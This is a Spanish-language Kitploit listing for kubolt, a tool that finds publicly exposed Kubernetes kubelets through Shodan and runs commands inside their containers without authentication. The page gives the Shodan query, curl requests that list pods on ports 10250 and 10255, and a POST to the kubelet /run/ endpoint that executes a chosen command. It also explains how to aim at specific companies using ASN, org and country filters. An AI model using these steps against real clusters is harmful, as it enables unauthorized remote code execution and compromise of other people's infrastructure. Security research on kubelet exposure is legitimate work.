Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
kubolt — Utilidad Kubolt para escanear clústeres públicos de Kubernetes | Kitploit
Herramientas/GitHubGitHub/averonesis/kubolt
OSINT (Inteligencia de Fuentes Abiertas)ReconocimientoEscáneres de VulnerabilidadesSeguridad de ContenedoresSeguridad en la NubeMala Configuración
GitHubaveronesis/kubolt

kubolt

Utilidad Kubolt para escanear clústeres públicos de Kubernetes

Ver Repositorio
11019hace 4 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

¿Qué?

Kubolt es una utilidad simple para escanear clústeres de Kubernetes públicos no autenticados y ejecutar comandos dentro de contenedores

¿Por qué?

A veces, el puerto 10250 de kubelet está abierto para acceso no autorizado y hace posible ejecutar comandos dentro de los contenedores usando la función getrun de kubelet:

root@kitploit:~
// getRun handles requests to run a command inside a container.
func (s *Server) getRun(request *restful.Request, response *restful.Response) {
	params := getExecRequestParams(request)
	pod, ok := s.host.GetPodByName(params.podNamespace, params.podName)
	if !ok {
		response.WriteError(http.StatusNotFound, fmt.Errorf("pod does not exist"))
		return
	}

¿Cómo?

Bien, preguntémosle a nuestro amigo Shodan :trollface:

La consulta básica es

ssl:true port:10250 404

Kubelet usa el puerto 10250 con SSL por defecto; 404 es la respuesta HTTP sin ruta de URL.

Kubolt le pregunta a Shodan por API para obtener una lista de direcciones IP y las guarda para otras acciones de OSINT 😁

Primero, preguntémosle a Kubelet por los pods en ejecución y filtremos los hosts donde la respuesta no contenga Unauthorized y contenga container para poder ejecutar un comando dentro de él.

root@kitploit:~
curl -k https://IP-de-Shodan:10250/runningpods/ 

De todas formas, si encuentras un host sin pods en ejecución en ese momento, guárdalo para la próxima vez que los pods puedan iniciarse 😁

Puedes listar todos los pods disponibles a partir de estas solicitudes:

root@kitploit:~
curl -k https://IP-de-Shodan:10250/pods/
#o
curl http://IP-de-Shodan:10255/pods/ 

Luego kubolt analiza la respuesta y genera una nueva solicitud como la siguiente:

root@kitploit:~
curl -XPOST -k https://IP-de-Shodan:10250/run/<namespace>/<PodName>/<containerName> -d "cmd=<comando-a-ejecutar>" 

Puedes apuntar a empresas con mayor precisión usando filtros de Shodan como:

  • asn
  • org
  • country
  • net

Instalación

root@kitploit:~
mkdir output
pip install -r requirements.txt 

Ejecución

root@kitploit:~
python kubolt.py --query "asn:123123 org:'ACME Corporation'"
#o
python kubolt.py --query "org:'ACME Corporation' country:UK"

Shodan

Kubolt usa la API de Shodan y Créditos de Consulta en consecuencia; si ejecutas la herramienta sin filtros de consulta, probablemente gastarás todos tus créditos ¯\_(ツ)_/¯

Demo

demo

Importante

La herramienta proporcionada por el autor debe usarse solo con fines educativos. El autor no puede ser considerado responsable por el mal uso de la herramienta. El autor no es responsable de ningún daño directo o indirecto causado por el uso de la herramienta.

Descargar herramienta